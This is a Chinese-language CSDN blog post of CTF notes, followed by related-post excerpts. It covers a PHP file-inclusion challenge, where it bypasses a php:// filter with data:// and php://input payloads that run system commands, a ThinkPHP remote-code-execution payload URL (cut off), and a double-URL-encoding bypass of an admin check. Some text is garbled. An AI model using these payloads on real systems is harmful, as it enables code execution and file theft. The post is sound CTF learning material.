ctf 记录

已于 2022-06-23 07:05:12 修改
阅读量146 收藏
点赞数
分类专栏: 通用 文章标签: java 前端 数据库
于 2022-06-22 22:13:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freshfox/article/details/125417706
版权

源码审计

文件包含: 

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

1. php://input   + post  数据 php 代码。 

 

在这里插入图片描述

 

2. ?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?> 

thinkphp rce 漏洞在利用的时候注意payload 

漏洞利用:
payload:
查看phpinfo:

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
1
查看敏感文件:

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_
 

<?php
if("admin"===$_GET[id]) {			
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

第一步,要使得"admin"===$_GET[id]不成立
我们可以对admin进行url编码,当然也可以对其中一个字母编码我们这里对a进行编码:%61dmin

第一次实际比较if("admin"==="%61dmin")   不成立
1
第二步,经过G E T [ i d ] = u r l d e c o d e ( _GET[id] = urldecode( 
G

 ET[id]=urldecode(_GET[id]);,使得$_GET[id] == "admin"成立。
经过urldecode解码后变成admin

第二次实际比较if("admin" == "admin");    成立
1
**注意:**当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode编码,运行时会自动进行一次urldecode

因为我们在url连接里直接运行,浏览器会进行一次url解码,所以我们还要进行一次url编码,就是对admin进行两次编码再运行

urldecode(%2561)=%61  
urldecode(%61)=a
 

freshfox
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php伪协议漏洞_文件包含漏洞+PHP的伪协议
weixin_29863809的博客
01-28 384
BugkuCTF点击发现url中有 ?file=show.php 并且题目flag在index里 猜测文件包含和PHP伪协议。猜测php://被过滤构造payload?file=php://filter/read=convert.base64-encode/resource=index.php用base64解码找到flagBugku-ctferror_reporting(0);if(!$_GET[...
20201229攻防世界WEB高手区题目一题多解全教程通关(1-6)
qq_45290991的博客
01-08 567
001baby_web 002Trainng WWW Robots 有关robots.txt的知识可以参考:https://www.cnblogs.com/yuzhongwusan/archive/2008/12/06/1348969.html 打开robots.txt会发现它只允许俄罗斯最大的搜索引擎爬取他的flag: 我们打开BP把自己的USER-agent改为Yandex就好了: 然后访问fl0g.php就会发现我们需要的flag:cyberpeace{3084111b0
Web_php_include-xctf
qq_43660551的博客
07-03 970
RCE-PHP
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4049
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
Web_php_include(strstr与str_replace函数)
sGanYu
08-24 1236
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);#查找php://,null替换查找的值,并且规定搜索$page } include($page); ?> strstr函数 strstr(str1,str2) 函数,判断字符串str2是否是s...
PHP2(.phps)
qq_53106085的博客
10-31 914
phps即为 PHP Source。 phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。 它的MIME类型为:text/html, application/x-httpd-php-source, application/x-httpd-php3-source。 XCTF的PHP
攻防世界-PHP2题
weixin_46784800的博客
11-13 1020
攻防世界-PHP2题 打开靶场网址后发现页面只有一句话: 该语句的意思为:你能验证这个网站吗? 常规操作,进行抓包,发现什么也没有抓到,进入index.php网址发现与当前界面相同,于是用御剑进行网址目录扫描: 扫描后可以发现存在网址/index.phps(如果没有扫描到,则说明你需要在字典中加入这个网址) 进入网址可看到页面的源代码,将源代码复制下来进行分析: 进行代码审计,可以发现页面存在传入参数id,并且,如果id的值为admin,则输出not allowed,且直接结束: if("admin
write-ups-2015:2015年CTF记录
05-02
【标题】"write-ups-2015:2015年CTF记录"揭示了这是一个关于2015年网络安全竞赛Capture The Flag (CTF)的文档集合。CTF是一种流行的信息安全竞赛,参赛者通过解决各种信息安全挑战来提升技能,包括密码破解、漏洞...
CTF-RE第一次出题记录
最新发布
10-21
CTF-RE第一次出题记录
【XCTF高手进阶区】web4_Web_php_include writeup(一)
Mitchell_Donovan的博客
01-27 325
web4_Web_php_include 原题链接 key:文件包含 ①页面打开后是一串php代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 先来简单了解一下本题涉及到的几个ph
攻防世界——文件包含与伪协议
yanfangjie的博客
01-17 715
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析这段代码的意思 strstr(page,"php://"):匹配PHP://在page,"php://"):匹配PHP:/
攻防世界web高阶(web_php_include)
ctfmove1的博客
07-16 678
payload:不过滤大小写,让page=php:// ?page=data:text/plain,<?php system("ls") ?> ?page=data:text/plain,<?php system("tac fl4gisisish3r3.php") ?> data伪协议 本例特殊之处在于: 知道文件, 但是 调用 cat、tail、 less、more 并不能显示文件内容,但是 有一个命令 tac:将文件全部内容从尾到头反向连续输出到标准输出(屏幕)上
L3HCTF2021几道简单的签到题
Hopeace的博客
11-25 1431
L3HCTF2021几道简单的签到题Misc WelcomeWeb Image1Web EasyPHP 作者:Hopeace Misc Welcome 第一次做misc的题目,迷迷糊糊的注册之后, 进去好像是个聊天室类似的东西 随便点点就找到了flag Web Image1 靶机地址:http://121.36.209.245:10001/ 附件下载地址:http://121.36.209.245:10001/static/deploy.zip 题目要求: Find flags in admin’s sha
L3H CTF
热门推荐
qq_51584770的博客
11-15 1万+
Easy PHP 思路:当把这段代码复制到本地的时候,发现源码长得很奇怪 if ("admin" == $_GET[username] &‮⁦+!!⁩⁦& "‮⁦CTF⁩⁦l3hctf" == $_GET[‮⁦L3H⁩⁦password]) { //Welcome to include "flag.php"; echo $flag; } 想到用url编码的方式,将源码进行编码 得到: if(“admin”==$_GET[username]&%E2%80%
特洛伊木马源攻击
qq_53460654的博客
11-19 994
L3HCTF的一道题 当时沉迷于什么什么杯中,所以没怎么打 现在来记录一下 攻击原理 cve-2021-42574 <?php error_reporting(0); if ("admin" == $_GET[username] & ‮⁦ + !!⁩⁦ & "‮⁦CTF⁩⁦l3hctf" == $_GET[‮⁦L3H⁩⁦password]) { //Welcome to include "flag.php"; echo $flag; } show_source(__FI
CTF题目记录3(二次编码,反序列化)
kkzzjx
05-15 1807
miniL被虐了QAQ太菜惹555 有精通php反序列化的旁友可以暗搓搓交换下思路 PHP2 (攻防世界) Can you anthenticate to this website? 其他什么都没有 index.phps源码泄露(记在小本本上,Phps是php的源码) 好脑洞 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_G
练习 > CTF解题 > OpenCTF 2017 > urldecode
Gunther的博客
09-09 3046
根据提示猜测源码: $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "openctf") {   echo "Access granted!";   echo "Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx "; } ?> 这题就是有病为什么非要大写呢? 啊啊,你要坚定就是这个思路点击链
ctf php数组问题,CTF中一些PHP问题小结(续)
weixin_30741979的博客
04-06 1122
md5绕过(hash比较缺陷)
2019 CTF题目下载及Write-up解析
Write up是指CTF题目的解题步骤和过程的详细记录,能够帮助其他参与者更好地理解和学习CTF题目的解题方法。本文档中提供了多个题目的write up,包括She、babyflash、otaku等多个题目。 **She题目解析** She题目是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值